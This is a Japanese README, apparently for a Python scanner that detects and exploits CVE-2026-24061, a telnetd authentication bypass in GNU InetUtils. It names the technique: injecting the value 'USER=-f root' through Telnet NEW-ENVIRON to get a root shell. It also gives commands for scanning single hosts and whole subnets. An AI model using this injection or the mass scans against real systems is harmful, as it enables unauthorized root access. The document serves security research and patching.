
CVE-2026-24061 — GNU InetUtils Telnetd 認証バイパススキャナー
GNU InetUtils telnetd バージョン 1.9.3 から 2.7 における重大な(CVSS 9.8)認証バイパス脆弱性 CVE-2026-24061 を検出・悪用する、Python ベースのセキュリティスキャナーです。
このスキャナーは、Telnet NEW-ENVIRON オプション(RFC 1572)を介して悪意のある USER=-f root 値を注入し、サーバーに認証をスキップさせて root シェルを取得させます。
id コマンドによるエクスプロイト後の確認# Scan single target
sudo python3 telnetd_scanner.py -t 192.168.56.101 -p 23 -v
# Scan entire subnet
sudo python3 telnetd_scanner.py -t 192.168.56.0/24 --threads 30
# Save report
sudo python3 telnetd_scanner.py -t 192.168.56.101 -o report.txt
# JSON output
sudo python3 telnetd_scanner.py -t 192.168.56.101 --format json -o report.json
| ソフトウェア | 脆弱なバージョン | 修正済みバージョン |
|---|---|---|
| GNU InetUtils telnetd | <= 2.7 | >= 2.8 |
このツールは認可されたセキュリティ研究および教育目的専用です。 所有していないシステム、または明示的なテスト許可を得ていないシステムに対しては使用しないでください。
Ahmad Sadeeq